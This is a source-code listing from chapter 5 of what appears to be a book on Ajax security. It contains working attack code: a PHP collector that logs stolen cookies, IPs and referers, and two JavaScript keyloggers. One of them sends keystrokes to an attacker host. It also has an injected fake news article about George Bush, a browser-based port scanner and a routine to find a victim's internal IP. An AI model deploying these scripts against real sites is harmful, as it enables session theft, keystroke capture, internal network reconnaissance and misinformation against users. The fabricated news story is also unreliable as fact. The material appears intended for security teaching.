Ajax Security - Source Code, Chapter 5
5.1 Stealing Cookies
cookie-sammler.php
<?
// Collect data
$geklautercookie = $_GET["geklautercookie"];
$ip = getenv ("REMOTE_ADDR");
$referer = getenv("HTTP_REFERER");
$datum = date("j. F Y, H:i");
// Assemble the entry
$daten = "Cookie: ".$geklautercookie." <br>";
$daten = $daten."IP: ".$ip." <br>";
$daten = $daten."Referer: ".$referer." <br>";
$daten = $daten."Datum und Zeit: ".$datum." <br>";
$daten = $daten." <hr> <br>";
// Write the entry to the file
$datei = fopen("geklaut.html", "a+");
fwrite($datei, $daten);
fclose($datei);
?>
5.2 Capturing Keyboard Input
Keylogger
<script>
var keylog = 'Tastendrücke: ';
document.onkeypress = function () {
    window.status = keylog += String.fromCharCode(window.event.keyCode);
}
</script>
Keylogger with Ajax
<script>
var serviceURL = "http://www.angreifer.example/tasten-sammler.php"
var req = new XMLHttpRequest();
var keylog = '';
document.onkeypress = function () {
    keylog += String.fromCharCode(window.event.keyCode);
    sendeDaten(keylog)
}
function sendeDaten(daten) {
    req.open("POST", serviceURL + "?tasten=" + encodeURIComponent(daten.value), true);
    req.send(null);
}
</script>
5.4 Injecting False Information
sc.js
document.write('<p align=left>Mon, 28 August 2006');
document.write('<p align=center><b>George Bush appoints a 9 year old to be the chairperson of the Information Security Deportment</b>');
document.write('<p>On Friday night, George Bush made an official announcement saying that Michael Antipov (http://michael.antipov.name), a 9 year old talented security specialist was to be the chairperson of the Information Security Department of the US. The debatable decision was approved by three-hour long discussion in the Senate. ');
document.write('<p>Michael Antipov was noticed by the FBI service for his outstanding skills in the sphere of Information Security. He proved his ability to preside the abovementioned department defending 34 governmental web sites from Lebanon terrorist attacks. ');
document.write('<p>Michael Antipov, sun of the top-secret US spy, was born in Russia. 2 years of age, together with his parents, he moved to the USA to start his carrier in the CIA kindergarten. He continued his studies in the educational institution sub controlled by the CIA (names being erased for purpose of the National Security). He obtained his MS degree being at the age of 7. Having reached the age of 8 he already had a PhD.');
document.write('<p>"From now on the citizens of the USA can feel safe for the National Information Security is in the young but good hands", said George Bush in his last speech.');
5.6 Port Scanning via JavaScript
Port scanner
PortScanner = {};
PortScanner.scanPort = function (callback, host, port, timeout) {
    var timeout = (timeout == null)?100:timeout;
    var img = new Image();
    img.onerror = function () {
        if (!img) return;
        img = undefined;
        callback(host, port, 'open');
    };
    img.onload = img.onerror;
    img.src = 'http://' + host + ':' + port;
    setTimeout(function () {
        if (!img) return;
        img = undefined;
        callback(host, port, 'closed');
    }, timeout);
};
Scanning multiple ports
PortScanner.scanHost = function (callback, host, ports, timeout)
{
    for (index = 0; index < ports.length; index++)
        PortScanner.scanPort(callback, host, ports[index], timeout);
};
Converting IP addresses
function erzeugeIPArray(ipString)
{
    // Split the string into an array of strings
    var stringArray = ipString.split('.');
    // Provide an array for the integer values
    var intArray = new Array();
    var i;
    for (i = 0; i < stringArray.length; i++)
    {
        // Convert the string to an integer value (always base 10)
        intArray[i] = parseInt(stringArray[i], 10);
    }
    return intArray;
}
Incrementing IP addresses
function erhoeheIP(dieIP)
{
    var i;
    for (i = 3; i >= 0; i--)
    {
        if (dieIP[i] < 255 || i == 0)
        {
            dieIP[i]++;
            return dieIP;
        }
        else {
            // The value in the current segment i cannot be incremented,
            // because that would cause an overflow.
            // Reset it to 0; the loop then continues with the segment
            // before it, which takes the carry.
            dieIP[i] = 0;
        }
    }
}
Determining the local IP address
AttackAPI.dom.getInternalIP = function () {
    try {
        var sock = new java.net.Socket();
        sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
        sock.connect(new java.net.InetSocketAddress(document.domain,(!document.location.port)?80:document.location.port));
        return sock.getLocalAddress().getHostAddress();
    } catch (e) {}
    return '127.0.0.1';
};